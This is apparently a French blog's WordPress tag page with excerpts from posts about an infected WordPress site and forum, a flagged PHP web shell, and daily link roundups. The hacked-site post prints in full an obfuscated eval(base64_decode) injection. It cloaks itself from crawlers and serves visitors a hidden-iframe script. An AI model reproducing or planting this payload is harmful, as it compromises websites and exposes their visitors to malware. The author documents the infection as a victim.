fbpx

Étiqueté : Wordpress

Securite 0

Hack de site… on continue

J’ai décidé d’explorer plus avant les fichiers de ce site, WordPress, mais aussi forum SMF lui aussi infecté. J’ai trouvé au début des fichiers index.php des deux sites un code ajouté: [php]eval(base64_decode(‘ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdGxQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9LWHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWEdJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkNUlHNG9NeWw3TlNCaVBWd25lRnduT3pVZ09EMW1JR3NvS1R0c0tEVWdhVDB3TzJrOGVqdHBLeXNwZXpoYllpNW5LR2srUGpRcEsySXVaeWhwSmtJcFhUMTFMbllvYVNsOVpDZ2hNeTUwS0M5ZVcyRXRjaTA1WFNva0wya3BLVzhnY1R0a0tETXVhQ1V5S1RNOVhDY3dYQ2NyTXpzMUlHMDlNeTVvT3pVZ056MW1JR3NvS1RzMUlHbzlNRHRzS0RVZ2FUMHdPMms4YlR0cEt6MHlLWHMzVzJvcksxMDlPRnN6TG5Bb2FTd3lLVjE5YnlBM0xrRW9YQ2RjSnlsOVpDaGpMall1UXloY0p6WTlaVnduS1QwOUxURXBlMk11UkNodUtGd25jMXduS1NrN1l5NDJQVnduTmoxM1BXVmNKMzBuTERRd0xEUXdMQ2Q4Zkh4a1lYUmhmSHgyWVhKOFkyOXZhMmxsZkhKbGMzVnNkSHhpTVRaZmJXRndmSHg4WWpFMlgyUnBaMmwwYzN4a2IyTjFiV1Z1ZEh4cFpueGxibUZpYkdWa2ZHNWxkM3hqYUdGeVFYUjhiR1Z1WjNSb2ZIeDhRWEp5WVhsOFptOXlmR3hzZkdoRVkyUjhjbVYwZFhKdWZITjFZbk4wY254bVlXeHpaWHhtTUh3ell6WTBOamszTmpJd056TTNORGM1Tm1NMk5UTmtNakkzTURabU56TTJPVGMwTmprMlpqWmxNMkV5TURZeE5qSTNNelptTm1NM05UYzBOalV6WWpJd05tTTJOVFkyTnpRellUSXdNbVF6TVRNNU16a3pPRGN3TnpnellqSXdOelEyWmpjd00yRXlNREprTXpJek9UTTVNelUzTURjNE0ySXlNak5sTTJNMk9UWTJOekkyTVRaa05qVXlNRGMzTmprMk5EYzBOamd6WkRJeU16TXlNakl3TmpnMk5UWTVOamMyT0RjME0yUXlNak16TWpJeU1EY3pOekkyTXpOa01qSTJPRGMwTnpRM01ETmhNbVl5WmpNMk5qUTJORFpoTXprek5qTTBOamt5WlRZek5qVXlaVFprTnpNeVpqWTVNbVUzTURZNE56QXpaalkzTm1ZelpETXhNakl6WlROak1tWTJPVFkyTnpJMk1UWmtOalV6WlROak1tWTJORFk1TnpZelpYeHRZWFJqYUh4VGRISnBibWQ4Wm5KdmJVTm9ZWEpEYjJSbGZHVnVZV0pzWldSamIyOXJhV1Y4TURFeU16UTFOamM0T1dGaVkyUmxabnhtZFc1amRHbHZibnd5TlRaOGFtOXBibnd4Tlh4cGJtUmxlRTltZkhkeWFYUmxKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLVHd2YzJOeWFYQjBQZz09Iik7DQp9’));[/php] Ouh le...

0

Un de mes sites WordPress infecté!

Sur un des sites sous WordPress que je gère, j’ai été étonné lors d’une sauvegarde sur disque d’obtenir une alerte de la part de Microsoft Security Essentials! Backdoor:PHP/WebShell.A http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Backdoor%3aPHP%2fWebShell.A&threatid=2147651339 Un fichier themes.php dans wp-adminincludes...

Windows Logo 0

Résumé des liens du jour

Nouveautés du 4 November 2011: Delicious: Tutoriel : Comment traduire un thème WordPress en français? Comment traduire un #theme #Wordpress http://t.co/LM791GNF via @@bisontouffu, Bel anagramme: Papandreou = Nappadeuro Bel anagramme: Papandreou = Nappadeuro http://t.co/hDnBnNPD via @TousPourUn, Installer un...

Lecture 0

Résumé des liens du jour

Nouveautés du 28 June 2011: TousPourUn le Forum: Afficher ou masquer la liste "Documents récents", SlimPDF, Trojan.Win32.Antavmu et Trojan-Spy.Win32.Golns, Vive le mois de Peut!, Team Fortress 2 gratuit!, E.T. le retour Delicious: Convertir un site Joomla en SPIP « Maniac Geek Convertir...

Windows Logo 0

Résumé des liens du jour

Nouveautés du 14 June 2011: TousPourUn le Forum: Sauvegardez l’activation Windows 7 Retail, OEM et MAK avec 7Tokens Manager Delicious: Les définitions toutes personnelles du « P’tit Robert » | Communauté de TousPourUn Les définitions toutes personnelles du...

Lecture 0

Résumé des liens du jour

Nouveautés du 1 June 2011: Delicious: QualiThemes – best quality free and premium WordPress 3.0 themes, La Bible de l’optimisation WordPress

Lecture 0

Résumé des liens du jour

Nouveautés du 30 May 2011: TousPourUn le Forum: Free Opener Delicious: Free Opener est une visionneuse de fichiers gratuit pour presque n’importe quel type de fichier: http://t.co/kFE8seR Free Opener est une visionneuse de fichiers gratuit pour...